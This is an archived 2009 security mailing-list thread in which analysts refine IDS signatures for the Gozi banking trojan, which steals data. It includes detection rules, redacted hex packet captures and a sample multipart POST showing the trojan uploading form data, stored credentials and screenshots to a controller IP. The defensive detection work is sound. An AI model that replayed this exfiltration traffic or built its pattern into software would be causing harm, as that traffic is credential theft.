[Emerging-Sigs] Gozi/Ordergun/Orderjack sig mod + new

Darren Spruell phatbuckett at gmail.com
Thu Jan 29 18:38:25 EST 2009


Don't forget ss.cgi (my post 1/28) and looks like there's also a file.cgi too:

http://ddanchev.blogspot.com/2008/01/random-js-malware-exploitation-kit.html

In addition to cert.cgi I've also picked up from somewhere that
certs.cgi has also been used (trying to find reference.)

I expect there to be more FPs out there; seen particularly forms.cgi used e.g.:

# yeah, it's a GET so no FP on the rule looking for POST but including
to illustrate
POST http://www.cowgirlartist.com/cgi-bin/forms.cgi
GET http://www.wirespring.com/cgi-bin/forms.cgi?form=3&headline=...
GET http://www.greenmountainenergy.com/cgi-bin/forms.cgi?form=6
GET http://www.sullarete.com/cgi-bin/forms.cgi?form=10
POST http://www.courtinfo.ca.gov/cgi-bin/forms.cgi
GET http://www.nwsc.org/cgi-bin/forms.cgi?form=1

...and cmd.cgi, options.cgi, file.cgi...:

GET  http://www.onlinefutureinc.com/cgi-bin/cmd.cgi?af=415398&u...
GET  http://iquote1.neoyen.net.tw/cgi-bin/file.cgi?ARG=otcname.dat
GET  http://www.scienceofbeingwell.net/cgi-bin/cmd.cgi?Imp=1006352
GET  http://sescompanies.net/cgi-bin/options.cgi?id=US00...

Further anchoring with the 'Content-Type: multipart...' header might
be worth including still, or there's an opportunity to match on "URL:
" for pstore.cgi and forms.cgi and the Content-Disposition and
Content-Type values if helpful:.

~~~~~~~~~~
POST /cgi-bin/forms.cgi HTTP/1.1
Content-Type: multipart/form-data;
boundary=--------------------------01400b2f08b7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 77.222.142.56
Content-Length: 358
Connection: Keep-Alive
Cache-Control: no-cache

----------------------------01400b2f08b7
Content-Disposition: form-data; name="upload_file"; filename="3337220749.0002"
Content-Type: application/octet-stream

URL: https://example.org
foo=bar

----------------------------01400b2f08b7--
~~~~~~~~~~

DS


On Thu, Jan 29, 2009 at 1:13 PM, dxp <dxp2532 at gmail.com> wrote:
> Good point on the PCRE.  It's worth breaking this one down into three rules
> instead:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Gozi
> Data Information Leakage (Forms)"; flow:established,to_server; content:"POST
> "; depth:5; uricontent:"/forms.cgi "; classtype:trojan-activity; sid:XXXXXX;
> rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Gozi
> Data Information Leakage (PStore)"; flow:established,to_server;
> content:"POST "; depth:5; uricontent:"/pstore.cgi ";
> classtype:trojan-activity; sid:XXXXXX; rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Gozi
> Data Information Leakage (Cert)"; flow:established,to_server; content:"POST
> "; depth:5; uricontent:"/cert.cgi "; classtype:trojan-activity; sid:XXXXXX;
> rev:1;)
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Thu, 2009-01-29 at 13:23 -0500, Matt Jonkman wrote:
>
> We can't go pcre on this, it'd be just too high a load. Have to stay
> with the 3 separate sigs for the main ruleset. but this would be useful
> on boxes without load issues.
>
> Matt
>
> dxp wrote:
>> I just double checked on one sample I have of this trojan from October
>> 2008 and the UAS is embeded in the binary.  However, this may change in
>> the future and then POSTs will be missed.
>>
>> I have the following sig applied on my production envrionment for
>> several months now and without False Positives:
>>
>>     alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
>>     Gozi Form Data Information Leakage"; flow:established,to_server;
>>     content:"POST "; depth:5;
>>     pcre:"/\/(forms|pstore|cert)\.cgi\sHTTP\/1\.[01]\x0d\x0a/i";
>>     classtype:trojan-activity; sid:XXXXXX; rev:1;)
>>
>>
>> -
>>
>> -=[ dxp ]=-
>> 0xA3F3C6E3
>>
>>
>>
>>
>> On Wed, 2009-01-28 at 01:50 -0700, Darren Spruell wrote:
>>> Picked up a Gozi infected host chatting with controller and noticed a
>>> few of the rules could do with an overhaul and a couple more could be
>>> added in for POST operations not detected. The base rules were
>>> 2003509/2003510/2003511 but I thought there was a couple of issues:
>>>
>>> - the rules have a content match where a trailing '?' is specified but
>>> are then followed by a pcre where it is missing. The communication
>>> I've got has no trailing question mark on the POSTs.
>>> - the rules seem needlessly heavy on pcre. i substituted content
>>> matches instead.
>>>
>>> # update to 2003511
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
>>> Gozi Form Data Information Leakage"; flow:to_server,established;
>>> content:"POST /cgi-bin/forms.cgi"; depth:23; content:"|0d
>>> 0a|Content-Type: multipart/form-data\; boundary="; content:"|0d
>>> 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)";
>>> content:"|0d 0a|Host\: "; classtype:trojan-activity;
>>> reference:url,www.secureworks.com/research/threats/gozi; sid:2003511;
>>> rev:3;)
>>> # new rule for POSTs of private store data
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
>>> Gozi Private Store Information Leakage"; flow:to_server,established;
>>> content:"POST /cgi-bin/pstore.cgi"; depth:24; content:"|0d
>>> 0a|Content-Type: multipart/form-data\; boundary="; content:"|0d
>>> 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)";
>>> content:"|0d 0a|Host\: "; classtype:trojan-activity;
>>> reference:url,www.secureworks.com/research/threats/gozi; sid:XXXXXXX;
>>> rev:1;)
>>> # new rule for POSTs of screenshot (JPEG) data
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
>>> Gozi Screen Capture Information Leakage"; flow:to_server,established;
>>> content:"POST /cgi-bin/ss.cgi"; depth:20; content:"|0d
>>> 0a|Content-Type: multipart/form-data\; boundary="; content:"|0d
>>> 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)";
>>> content:"|0d 0a|Host\: "; classtype:trojan-activity;
>>> reference:url,www.secureworks.com/research/threats/gozi; sid:XXXXXXX;
>>> rev:1;)
>>>
>>>
>>> There's room for improvement with tightening these down if needed by
>>> anchoring the content matches or adding additional payload. Obfuscated
>>> requests included below.
>>>
>>>
>>> --- snip forms.cgi ---
>>>   0x0000:  4500 02a1 1c37 4000 7a06 d19f 83c9 b0a0  E....7 at .z.......
>>>   0x0010:  4dde 8e38 04f3 0050 a837 99c8 e53f 91bf  M..8...P.7...?..
>>>   0x0020:  5018 fc00 21df 0000 504f 5354 202f 6367  P...!...POST./cg
>>>   0x0030:  692d 6269 6e2f 666f 726d 732e 6367 6920  i-bin/forms.cgi.
>>>   0x0040:  4854 5450 2f31 2e31 0d0a 436f 6e74 656e  HTTP/1.1..Conten
>>>   0x0050:  742d 5479 7065 3a20 6d75 6c74 6970 6172  t-Type:.multipar
>>>   0x0060:  742f 666f 726d 2d64 6174 613b 2062 6f75  t/form-data;.bou
>>>   0x0070:  6e64 6172 793d 2d2d 2d2d 2d2d 2d2d 2d2d  ndary=----------
>>>   0x0080:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0090:  3031 3430 3062 3266 3038 6237 0d0a 5573  01400b2f08b7..Us
>>>   0x00a0:  6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c  er-Agent:.Mozill
>>>   0x00b0:  612f 342e 3020 2863 6f6d 7061 7469 626c  a/4.0.(compatibl
>>>   0x00c0:  653b 204d 5349 4520 362e 303b 2057 696e  e;.MSIE.6.0;.Win
>>>   0x00d0:  646f 7773 204e 5420 352e 3129 0d0a 486f  dows.NT.5.1)..Ho
>>>   0x00e0:  7374 3a20 3737 2e32 3232 2e31 3432 2e35  st:.77.222.142.5
>>>   0x00f0:  360d 0a43 6f6e 7465 6e74 2d4c 656e 6774  6..Content-Lengt
>>>   0x0100:  683a 2033 3538 0d0a 436f 6e6e 6563 7469  h:.358..Connecti
>>>   0x0110:  6f6e 3a20 4b65 6570 2d41 6c69 7665 0d0a  on:.Keep-Alive..
>>>   0x0120:  4361 6368 652d 436f 6e74 726f 6c3a 206e  Cache-Control:.n
>>>   0x0130:  6f2d 6361 6368 650d 0a0d 0a2d 2d2d 2d2d  o-cache....-----
>>>   0x0140:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0150:  2d2d 2d2d 2d2d 2d30 3134 3030 6232 6630  -------01400b2f0
>>>   0x0160:  3862 370d 0a43 6f6e 7465 6e74 2d44 6973  8b7..Content-Dis
>>>   0x0170:  706f 7369 7469 6f6e 3a20 666f 726d 2d64  position:.form-d
>>>   0x0180:  6174 613b 206e 616d 653d 2275 706c 6f61  ata;.name="uploa
>>>   0x0190:  645f 6669 6c65 223b 2066 696c 656e 616d  d_file";.filenam
>>>   0x01a0:  653d 2233 3333 3732 3230 3734 392e 3030  e="3337220749.00
>>>   0x01b0:  3032 220d 0a43 6f6e 7465 6e74 2d54 7970  02"..Content-Typ
>>>   0x01c0:  653a 2061 7070 6c69 6361 7469 6f6e 2f6f  e:.application/o
>>>   0x01d0:  6374 6574 2d73 7472 6561 6d0d 0a0d 0a55  ctet-stream....U
>>>   0x01e0:  524c 3a20 6874 7470 733a 2f2f xxxx xxxx  RL:.https://xxxx
>>>   0x01f0:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0200:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0210:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0220:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0230:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0240:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0250:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0260:  6564 6972 6563 742e 6e73 6625 3346 4f70  edirect.nsf%3FOp
>>>   0x0270:  656e 0a0d 0a2d 2d2d 2d2d 2d2d 2d2d 2d2d  en...-----------
>>>   0x0280:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0290:  2d30 3134 3030 6232 6630 3862 372d 2d0d  -01400b2f08b7--.
>>>   0x02a0:  0a
>>> --- snip ---
>>>
>>>
>>> --- snip pstore.cgi ---
>>>   0x0000:  4500 013d 01c6 4000 7a06 ed74 83c9 b0a0  E..=.. at .z..t....
>>>   0x0010:  4dde 8e38 043b 0050 9534 9b64 59fd a004  M..8.;.P.4.dY...
>>>   0x0020:  5018 fc00 c3af 0000 504f 5354 202f 6367  P.......POST./cg
>>>   0x0030:  692d 6269 6e2f 7073 746f 7265 2e63 6769  i-bin/pstore.cgi
>>>   0x0040:  2048 5454 502f 312e 310d 0a43 6f6e 7465  .HTTP/1.1..Conte
>>>   0x0050:  6e74 2d54 7970 653a 206d 756c 7469 7061  nt-Type:.multipa
>>>   0x0060:  7274 2f66 6f72 6d2d 6461 7461 3b20 626f  rt/form-data;.bo
>>>   0x0070:  756e 6461 7279 3d2d 2d2d 2d2d 2d2d 2d2d  undary=---------
>>>   0x0080:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0090:  2d31 6535 3830 6534 3930 3537 350d 0a55  -1e580e490575..U
>>>   0x00a0:  7365 722d 4167 656e 743a 204d 6f7a 696c  ser-Agent:.Mozil
>>>   0x00b0:  6c61 2f34 2e30 2028 636f 6d70 6174 6962  la/4.0.(compatib
>>>   0x00c0:  6c65 3b20 4d53 4945 2036 2e30 3b20 5769  le;.MSIE.6.0;.Wi
>>>   0x00d0:  6e64 6f77 7320 4e54 2035 2e31 290d 0a48  ndows.NT.5.1)..H
>>>   0x00e0:  6f73 743a 2037 372e 3232 322e 3134 322e  ost:.77.222.142.
>>>   0x00f0:  3536 0d0a 436f 6e74 656e 742d 4c65 6e67  56..Content-Leng
>>>   0x0100:  7468 3a20 3136 3630 0d0a 436f 6e6e 6563  th:.1660..Connec
>>>   0x0110:  7469 6f6e 3a20 4b65 6570 2d41 6c69 7665  tion:.Keep-Alive
>>>   0x0120:  0d0a 4361 6368 652d 436f 6e74 726f 6c3a  ..Cache-Control:
>>>   0x0130:  206e 6f2d 6361 6368 650d 0a0d 0a         .no-cache....
>>>
>>>   0x0000:  4500 05dc 01c7 4000 7a06 e8d4 83c9 b0a0  E..... at .z.......
>>>   0x0010:  4dde 8e38 043b 0050 9534 9c79 59fd a004  M..8.;.P.4.yY...
>>>   0x0020:  5010 fc00 176e 0000 2d2d 2d2d 2d2d 2d2d  P....n..--------
>>>   0x0030:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0040:  2d2d 2d2d 3165 3538 3065 3439 3035 3735  ----1e580e490575
>>>   0x0050:  0d0a 436f 6e74 656e 742d 4469 7370 6f73  ..Content-Dispos
>>>   0x0060:  6974 696f 6e3a 2066 6f72 6d2d 6461 7461  ition:.form-data
>>>   0x0070:  3b20 6e61 6d65 3d22 7570 6c6f 6164 5f66  ;.name="upload_f
>>>   0x0080:  696c 6522 3b20 6669 6c65 6e61 6d65 3d22  ile";.filename="
>>>   0x0090:  3333 3337 3232 3037 3439 2e30 3030 3222  3337220749.0002"
>>>   0x00a0:  0d0a 436f 6e74 656e 742d 5479 7065 3a20  ..Content-Type:.
>>>   0x00b0:  6170 706c 6963 6174 696f 6e2f 6f63 7465  application/octe
>>>   0x00c0:  742d 7374 7265 616d 0d0a 0d0a 5552 4c3a  t-stream....URL:
>>>   0x00d0:  2068 7474 703a 2f2f xxxx xxxx xx2e 636f  .http://xxxxx.co
>>>   0x00e0:  6d2f 0a09 4c6f 6769 6e3a 20xx xxxx xxxx  m/..Login:.xxxxx
>>>   0x00f0:  xxxx xx40 xxxx xxxx xxxx xxxx xxxx 2e63  xxx at xxxxxxxxxx.c
>>> <mailto:xxx at xxxxxxxxxx.c>
>>>   0x0100:  6f6d 0a0a                                om..
>>> --- snip ---
>>>
>>>
>>>
>>> --- snip ss.cgi ---
>>>   0x0000:  4500 013a 7832 4000 7a06 770b 83c9 b0a0  E..:x2 at .z.w.....
>>>   0x0010:  4dde 8e38 09b6 0050 3536 8438 b717 9b0b  M..8...P56.8....
>>>   0x0020:  5018 fc00 0e6d 0000 504f 5354 202f 6367  P....m..POST./cg
>>>   0x0030:  692d 6269 6e2f 7373 2e63 6769 2048 5454  i-bin/ss.cgi.HTT
>>>   0x0040:  502f 312e 310d 0a43 6f6e 7465 6e74 2d54  P/1.1..Content-T
>>>   0x0050:  7970 653a 206d 756c 7469 7061 7274 2f66  ype:.multipart/f
>>>   0x0060:  6f72 6d2d 6461 7461 3b20 626f 756e 6461  orm-data;.bounda
>>>   0x0070:  7279 3d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ry=-------------
>>>   0x0080:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d31 3634  -------------164
>>>   0x0090:  6530 3465 3230 3163 360d 0a55 7365 722d  e04e201c6..User-
>>>   0x00a0:  4167 656e 743a 204d 6f7a 696c 6c61 2f34  Agent:.Mozilla/4
>>>   0x00b0:  2e30 2028 636f 6d70 6174 6962 6c65 3b20  .0.(compatible;.
>>>   0x00c0:  4d53 4945 2036 2e30 3b20 5769 6e64 6f77  MSIE.6.0;.Window
>>>   0x00d0:  7320 4e54 2035 2e31 290d 0a48 6f73 743a  s.NT.5.1)..Host:
>>>   0x00e0:  2037 372e 3232 322e 3134 322e 3536 0d0a  .77.222.142.56..
>>>   0x00f0:  436f 6e74 656e 742d 4c65 6e67 7468 3a20  Content-Length:.
>>>   0x0100:  3835 3039 330d 0a43 6f6e 6e65 6374 696f  85093..Connectio
>>>   0x0110:  6e3a 204b 6565 702d 416c 6976 650d 0a43  n:.Keep-Alive..C
>>>   0x0120:  6163 6865 2d43 6f6e 7472 6f6c 3a20 6e6f  ache-Control:.no
>>>   0x0130:  2d63 6163 6865 0d0a 0d0a                 -cache....
>>>
>>>   0x0000:  4500 05dc 7833 4000 7a06 7268 83c9 b0a0  E...x3 at .z.rh....
>>>   0x0010:  4dde 8e38 09b6 0050 3536 854a b717 9b0b  M..8...P56.J....
>>>   0x0020:  5010 fc00 9e4e 0000 2d2d 2d2d 2d2d 2d2d  P....N..--------
>>>   0x0030:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0040:  2d2d 2d2d 3136 3465 3034 6532 3031 6336  ----164e04e201c6
>>>   0x0050:  0d0a 436f 6e74 656e 742d 4469 7370 6f73  ..Content-Dispos
>>>   0x0060:  6974 696f 6e3a 2066 6f72 6d2d 6461 7461  ition:.form-data
>>>   0x0070:  3b20 6e61 6d65 3d22 7570 6c6f 6164 5f66  ;.name="upload_f
>>>   0x0080:  696c 6522 3b20 6669 6c65 6e61 6d65 3d22  ile";.filename="
>>>   0x0090:  3333 3337 3232 3037 3439 2e30 3030 3222  3337220749.0002"
>>>   0x00a0:  0d0a 436f 6e74 656e 742d 5479 7065 3a20  ..Content-Type:.
>>>   0x00b0:  6170 706c 6963 6174 696f 6e2f 6f63 7465  application/octe
>>>   0x00c0:  742d 7374 7265 616d 0d0a 0d0a ffd8 ffe0  t-stream........
>>>   0x00d0:  0010 4a46 4946 0001 0101 0060 0060 0000  ..JFIF.....`.`..
>>> --- snip ---
>>>
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>



-- 
Darren Spruell
phatbuckett at gmail.com


More information about the Emerging-sigs mailing list